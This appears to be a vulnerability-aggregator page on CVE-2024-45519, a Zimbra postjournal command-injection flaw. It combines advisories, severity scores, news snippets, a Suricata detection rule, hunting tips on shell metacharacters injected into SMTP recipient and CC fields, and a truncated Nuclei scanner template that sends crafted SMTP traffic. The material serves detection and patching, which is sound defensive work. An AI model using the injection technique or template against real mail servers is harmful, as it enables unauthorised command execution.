CVE-2024-45519
published 2024-10-02CVE-2024-45519: The postjournal service in Zimbra Collaboration (ZCS) before 8.8.15 Patch 46, 9 before 9.0.0 Patch 41, 10 before 10.0.9, and 10.1 before 10.1.1 sometimes…
PriorityP199critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2024-10-24
Exploited in the wild
EPSS
99.98%
100.0th percentile
The postjournal service in Zimbra Collaboration (ZCS) before 8.8.15 Patch 46, 9 before 9.0.0 Patch 41, 10 before 10.0.9, and 10.1 before 10.1.1 sometimes allows unauthenticated users to execute commands.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| synacor | zimbra_collaboration_suite | < 8.8.15 | 8.8.15 |
| synacor | zimbra_collaboration_suite | — | — |
| synacor | zimbra_collaboration_suite | — | — |
| synacor | zimbra_collaboration_suite | — | — |
| synacor | zimbra_collaboration_suite | >= 10.0.0 < 10.0.9 | 10.0.9 |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert smtp any any -> [$HOME_NET,$SMTP_SERVERS] any (msg:"ET EXPLOIT Zimbra postjournal RCE Attempt Inbound (CVE-2024-45519)"; flow:established,to_server; content:"|0d 0a|RCPT|20|TO|3a 20|"; fast_pattern; content:"|24 28|"; within:200; pcre:"/^RCPT\x20TO\x3a\x20.*?\x24\x28/mi"; reference:cve,2024-45519; classtype:attempted-admin; sid:2056356; rev:2; metadata:created_at 2024_09_30, cve CVE_2024_45519, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_11_26, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
bytes
|24 28| within RCPT TO field
- →Monitor SMTP traffic for shell metacharacters (specifically '$(' — 0x24 0x28) injected into the RCPT TO field, which indicates command injection attempts against Zimbra's postjournal service.
- →Attackers spoof Gmail addresses and embed base64-encoded commands in the CC field of emails sent to Zimbra SMTP servers; inspect CC headers for base64 payloads. ↗
- →Hunt for webshell activity on Zimbra servers by monitoring HTTP requests containing both JSESSIONID and JACTION cookies, which are the webshell's trigger and command-delivery mechanism. ↗
- →The exploit targets Zimbra's postjournal service on TCP port 10027; restrict or monitor access to this port from untrusted networks. ↗
- →The root cause is unsanitized input passed to the popen() function; patched versions replace popen with execvp. Presence of popen in postjournal binary indicates a vulnerable version. ↗
- →Over 50,000 web-exposed Zimbra servers were reported as still vulnerable; prioritize internet-facing Zimbra instances for patching and detection coverage. ↗
- ·The postjournal service is not enabled by default on all Zimbra deployments; disabling it if not required eliminates the attack surface entirely. ↗
- ·Misconfigured 'mynetworks' settings can allow unauthorized external access to postjournal; ensure mynetworks is restricted to trusted hosts to limit exploitation. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck10.0CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Synacor Zimbra Collaboration Suite (ZCS) Command Execution Vulnerability
cisa·2024-10-03·CVSS 9.8
CVE-2024-45519 [CRITICAL] CWE-284 Synacor Zimbra Collaboration Suite (ZCS) Command Execution Vulnerability
Vulnerability: Synacor Zimbra Collaboration Suite (ZCS) Command Execution Vulnerability
Affected: Synacor Zimbra Collaboration Suite (ZCS)
Synacor Zimbra Collaboration Suite (ZCS) contains an unspecified vulnerability in the postjournal service that may allow an unauthenticated user to execute commands.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories ; https://nvd.nist.gov/vuln/detail/CVE-2024-45519
Remediation Due Date: 2024-10-24
GHSA
GHSA-fr4c-ch83-r968: The postjournal service in Zimbra Collaboration (ZCS) before 8
ghsa_unreviewed·2024-10-03
CVE-2024-45519 [CRITICAL] CWE-284 GHSA-fr4c-ch83-r968: The postjournal service in Zimbra Collaboration (ZCS) before 8
The postjournal service in Zimbra Collaboration (ZCS) before 8.8.15 Patch 46, 9 before 9.0.0 Patch 41, 10 before 10.0.9, and 10.1 before 10.1.1 sometimes allows unauthenticated users to execute commands.
VulnCheck
Synacor Zimbra Collaboration Suite (ZCS) Command Execution Vulnerability
vulncheck·2024·CVSS 10.0
CVE-2024-45519 [CRITICAL] CWE-284 Synacor Zimbra Collaboration Suite (ZCS) Command Execution Vulnerability
Synacor Zimbra Collaboration Suite (ZCS) Command Execution Vulnerability
Synacor Zimbra Collaboration Suite (ZCS) contains an unspecified vulnerability in the postjournal service that may allow an unauthenticated user to execute commands.
Affected: Synacor Zimbra Collaboration Suite (ZCS)
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://x.com/JusticeRage/status/1841017884245438555; https://x.com/threatinsight/status/1841089939905134793; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.fortiguard.com/outbreak-alert/zimbra-collaboration-rce; https://cert.pl/uploads/docs/Report_CP_2024.pdf; https://www.enisa.europa.eu/sites/default/fi
Suricata
ET EXPLOIT Zimbra postjournal RCE Attempt Inbound (CVE-2024-45519)
suricata·2024-09-30·CVSS 10.0
CVE-2024-45519 [CRITICAL] ET EXPLOIT Zimbra postjournal RCE Attempt Inbound (CVE-2024-45519)
ET EXPLOIT Zimbra postjournal RCE Attempt Inbound (CVE-2024-45519)
Rule: alert smtp any any -> [$HOME_NET,$SMTP_SERVERS] any (msg:"ET EXPLOIT Zimbra postjournal RCE Attempt Inbound (CVE-2024-45519)"; flow:established,to_server; content:"|0d 0a|RCPT|20|TO|3a 20|"; fast_pattern; content:"|24 28|"; within:200; pcre:"/^RCPT\x20TO\x3a\x20.*?\x24\x28/mi"; reference:cve,2024-45519; classtype:attempted-admin; sid:2056356; rev:2; metadata:created_at 2024_09_30, cve CVE_2024_45519, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_11_26, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
Nuclei
Zimbra Collaboration Suite < 9.0.0 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2024-45519 [CRITICAL] Zimbra Collaboration Suite < 9.0.0 - Remote Code Execution
Zimbra Collaboration Suite \r\n');
conn.RecvString()
conn.Send('RCPT TO: \r\n');
conn.RecvString()
conn.Send('DATA\r\n');
conn.RecvString()
conn.Send('aaa\r\n');
conn.RecvString()
conn.Send('.\r\n');
resp = conn.RecvString()
conn.Send('QUIT\r\n');
conn.Close()
resp
args:
Host: "{{Host}}"
Port: 25
oast: "{{interactsh-url}}"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
words:
- "message delivered"
# digest: 4a0a00473045022100d2df804796f6d14d7db541eb8f1e67347069cf9ab3aafe42ba406950d562661502207241c775eba870172603a116bdb8adb113834644df32348171e99f41701112ee:922c64590222798bb761d5b6d8e72950
Securelist
Exploits and vulnerabilities in Q3 2024
blogs_securelist·2024-12-06·CVSS 8.1
CVE-2024-47177 [HIGH] Exploits and vulnerabilities in Q3 2024
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most prevalent exploits
Vulnerability exploitation in APT attacks
Interesting vulnerabilities
CVE-2024-47177 (CUPS filters)
CVE-2024-38112 (MSHTML Spoofing)
CVE-2024-6387 (regreSSHion)
CVE-2024-3183 (Free IPA)
CVE-2024-45519 (Zimbra)
CVE-2024-5290 (Ubuntu wpa_supplicant)
Conclusion and advice
Authors
Alexander Kolesnikov
Q3 2024 saw multiple vulnerabilities discovered in Windows and Linux subsystems that are not standard for cyberattacks. This is because operating system developers have been releasing new security mitigations for whole sets of vulnerabilities in commonly used subsystems. For example, a log integrity check is set to appear in the Co
Securelist
Analyzing the vulnerability landscape in Q3 2024
blogs_securelist·2024-12-06·CVSS 8.1
CVE-2024-47177 [HIGH] Analyzing the vulnerability landscape in Q3 2024
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- Interesting vulnerabilities
- CVE-2024-47177 (CUPS filters)
- CVE-2024-38112 (MSHTML Spoofing)
- CVE-2024-6387 (regreSSHion)
- CVE-2024-3183 (Free IPA)
- CVE-2024-45519 (Zimbra)
- CVE-2024-5290 (Ubuntu wpa_supplicant)
- Conclusion and advice
Authors
- Alexander Kolesnikov
Q3 2024 saw multiple vulnerabilities discovered in Windows and Linux subsystems that are not standard for cyberattacks. This is because operating system developers have been releasing new security mitigations for whole sets of vulnerabilities in commonly used subsystems. For example, a log integrity check is set to appear in the Common Log Filing System (CLFS) in Windows, so the number
Checkpoint
7th October– Threat Intelligence Report
blogs_checkpoint·2024-10-07
CVE-2024-45519 7th October– Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 7th October– Threat Intelligence Report
For the latest discoveries in cyber research for the week of 7th October, please download our Threat Intelligence Bulletin .
TOP ATTACKS AND BREACHES
Chinese state-sponsored hackers, dubbed “Salt Typhoon”, infiltrated US telecom companies such as Verizon, AT&T, and Lumen Technologies. The attackers gained access to systems used for court-authorized wiretaps, potentially remaining undetected for months while collecting sensitive information.
French press agency AFP has di
Bleepingcomputer
Critical Zimbra RCE flaw exploited to backdoor servers using emails
blogs_bleepingcomputer·2024-10-02·CVSS 10.0
CVE-2024-45519 [CRITICAL] Critical Zimbra RCE flaw exploited to backdoor servers using emails
## Critical Zimbra RCE flaw exploited to backdoor servers using emails
## Bill Toulas
Hackers are actively exploiting a recently disclosed RCE vulnerability in Zimbra email servers that can be triggered simply by sending specially crafted emails to the SMTP server.
The Zimbra remote code execution flaw is tracked as CVE-2024-45519 and exists in Zimbra's postjournal service, which is used to parse incoming emails over SMTP. Attackers can exploit the vulnerability by sending specially crafted emails with commands to execute in the CC field, which are then executed when the postjournal service processes the email.
The malicious activity was first reported by HarfangLab's threat researcher Ivan Kwiatkowski, who characterized it as "mass-exploitation," and was subsequently also confirmed by
Greynoiseio
NoiseLetter October 2024
blogs_greynoiseio
NoiseLetter October 2024
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
https://wiki.zimbra.com/wiki/Security_Centerhttps://wiki.zimbra.com/wiki/Zimbra_Releases/10.0.9#Security_Fixeshttps://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.1#Security_Fixeshttps://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P46#Security_Fixeshttps://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P41#Security_Fixeshttps://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policyhttps://blog.projectdiscovery.io/zimbra-remote-code-execution/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-45519
2024-10-02
Published
2024-10-03
Added to CISA KEV
Exploited in the wild